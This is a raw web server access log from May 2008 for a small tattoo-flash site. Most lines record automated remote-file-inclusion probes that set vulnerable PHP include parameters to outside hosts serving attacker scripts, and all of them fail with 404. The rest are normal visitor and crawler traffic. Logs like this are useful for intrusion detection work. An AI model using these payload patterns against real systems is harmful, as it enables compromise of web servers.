82.100.220.35 - - [23/May/2008:07:54:02 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raaness.no//modules/Forums/admin/language/r0x.id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
161.58.178.229 - - [23/May/2008:07:54:24 -0500] "GET /logs/access_log.1207180800//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:54:24 -0500] "GET //popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:54:24 -0500] "GET /logs//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
77.48.10.14 - - [23/May/2008:07:58:18 -0500] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
77.48.10.14 - - [23/May/2008:07:58:18 -0500] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
212.69.204.75 - - [23/May/2008:07:59:00 -0500] "GET /logs/errors.php?error=http://www.brahmrishi-it.com/heal/docs/test.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
212.69.204.75 - - [23/May/2008:07:59:01 -0500] "GET /errors.php?error=http://www.brahmrishi-it.com/heal/docs/test.txt?? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
69.94.56.97 - - [23/May/2008:07:59:12 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raaness.no//modules/Forums/admin/language/r0x.id.txt???? HTTP/1.0" 404 313 "-""libwww-perl/5.48"
69.94.56.97 - - [23/May/2008:07:59:12 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raaness.no//modules/Forums/admin/language/r0x.id.txt???? HTTP/1.0" 404 308 "-""libwww-perl/5.48"
161.58.178.229 - - [23/May/2008:07:59:36 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:59:36 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:00:39 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:00:39 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:00:43 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:00:43 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:00:44 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:00:44 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:00:46 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:00:46 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:01:01 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:01:01 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
217.16.26.124 - - [23/May/2008:08:01:05 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raaness.no//modules/Forums/admin/language/r0x.id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
217.16.26.124 - - [23/May/2008:08:01:06 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raaness.no//modules/Forums/admin/language/r0x.id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
87.233.151.53 - - [23/May/2008:08:05:16 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
87.233.151.53 - - [23/May/2008:08:05:16 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
82.146.59.231 - - [23/May/2008:08:06:42 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
82.146.59.231 - - [23/May/2008:08:06:42 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
216.32.94.50 - - [23/May/2008:08:15:23 -0500] "GET /errors.php?error=http://www.brahmrishi-it.com/heal/docs/test.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
216.32.94.50 - - [23/May/2008:08:15:23 -0500] "GET /logs/errors.php?error=http://www.brahmrishi-it.com/heal/docs/test.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
161.58.178.229 - - [23/May/2008:08:15:35 -0500] "GET /logs/access_log.1207180800//popup_window.php?site_isp_root=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:15:35 -0500] "GET /logs/access_log.1207180800//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:15:37 -0500] "GET //popup_window.php?site_isp_root=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:15:37 -0500] "GET //popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:15:37 -0500] "GET /logs/access_log.1207180800//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:15:37 -0500] "GET /logs//popup_window.php?site_isp_root=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:15:37 -0500] "GET /logs//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:15:37 -0500] "GET //popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:08:15:37 -0500] "GET /logs//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
87.233.151.53 - - [23/May/2008:08:21:07 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.233.151.53 - - [23/May/2008:08:21:07 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
211.20.85.150 - - [23/May/2008:08:22:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
208.111.154.15 - - [23/May/2008:08:28:35 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [23/May/2008:08:28:35 -0500] "GET /?S=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
207.7.108.240 - - [23/May/2008:08:28:45 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
207.7.108.240 - - [23/May/2008:08:28:45 -0500] "GET //skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
69.89.25.168 - - [23/May/2008:08:31:26 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
69.89.25.168 - - [23/May/2008:08:31:27 -0500] "GET //skin/zero_vote/error.php?dir=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
67.19.107.26 - - [23/May/2008:08:37:01 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
67.19.107.26 - - [23/May/2008:08:37:02 -0500] "GET //skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
80.67.19.46 - - [23/May/2008:08:38:29 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 318 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.67.19.46 - - [23/May/2008:08:38:29 -0500] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
65.55.208.135 - - [23/May/2008:08:40:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [23/May/2008:08:40:02 -0500] "GET /logs/access_log.1202860800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.28.68.88 - - [23/May/2008:08:42:38 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
202.28.68.88 - - [23/May/2008:08:42:39 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
202.28.68.88 - - [23/May/2008:08:43:23 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
202.28.68.88 - - [23/May/2008:08:43:23 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
216.188.60.54 - - [23/May/2008:08:47:17 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
216.188.60.54 - - [23/May/2008:08:47:18 -0500] "GET //skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
85.214.32.233 - - [23/May/2008:08:52:38 -0500] "GET /logs/index1.php?page=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.214.32.233 - - [23/May/2008:08:52:39 -0500] "GET /index1.php?page=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
193.6.50.161 - - [23/May/2008:08:55:47 -0500] "GET /logs/access_log.1207785600//modules/My_eGallery/index.php?basepath=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
193.6.50.161 - - [23/May/2008:08:55:48 -0500] "GET //modules/My_eGallery/index.php?basepath=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
193.6.50.161 - - [23/May/2008:08:55:48 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
65.55.208.119 - - [23/May/2008:09:03:58 -0500] "GET /tattoo/links.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
206.219.189.8 - - [23/May/2008:09:04:02 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
206.219.189.8 - - [23/May/2008:09:04:02 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
206.219.189.8 - - [23/May/2008:09:04:02 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
206.219.189.8 - - [23/May/2008:09:04:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
65.55.208.119 - - [23/May/2008:09:04:08 -0500] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
80.67.19.46 - - [23/May/2008:09:08:13 -0500] "GET /logs/access_log.1207785600//oneadmin/photogallery/include.php?path[docroot]=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 345 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.67.19.46 - - [23/May/2008:09:08:13 -0500] "GET /logs/access_log.1207785600/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 321 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.67.19.46 - - [23/May/2008:09:08:14 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 318 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.67.19.46 - - [23/May/2008:09:08:14 -0500] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.67.19.46 - - [23/May/2008:09:08:14 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 323 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
80.67.19.46 - - [23/May/2008:09:08:15 -0500] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 299 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
64.15.159.42 - - [23/May/2008:09:12:41 -0500] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
64.15.159.42 - - [23/May/2008:09:12:42 -0500] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
80.58.205.45 - - [23/May/2008:09:14:23 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.es/search?hl=es&q=vintage+tattoo+flash&start=40&sa=N""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:24 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:25 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:25 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:26 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:27 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:45 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:46 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:47 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:47 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:48 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:48 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:48 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:49 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:14:49 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:17:01 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:17:02 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:17:02 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:17:03 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:17:04 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:17:04 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:17:04 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:17:04 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:17:05 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:17:05 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:17:05 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.141.39.30 - - [23/May/2008:09:20:16 -0500] "GET /logs//AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
62.141.39.30 - - [23/May/2008:09:20:17 -0500] "GET //AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
89.255.60.210 - - [23/May/2008:09:25:53 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
89.255.60.210 - - [23/May/2008:09:25:53 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
89.255.60.210 - - [23/May/2008:09:25:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
89.255.60.210 - - [23/May/2008:09:25:54 -0500] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
66.249.67.211 - - [23/May/2008:09:33:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Googlebot-Image/1.0"
66.249.67.211 - - [23/May/2008:09:33:05 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "-""Googlebot-Image/1.0"
200.249.155.6 - - [23/May/2008:09:35:23 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
80.58.205.45 - - [23/May/2008:09:40:25 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.es/search?um=1&hl=es&q=%22vintage+tattoo+flash%22&btnmeta%3Dsearch%3Dsearch=Buscar+en+la+Web""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:26 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:26 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:48 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:49 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:49 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:50 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:50 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:51 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:51 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:51 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:51 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.58.205.45 - - [23/May/2008:09:40:52 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
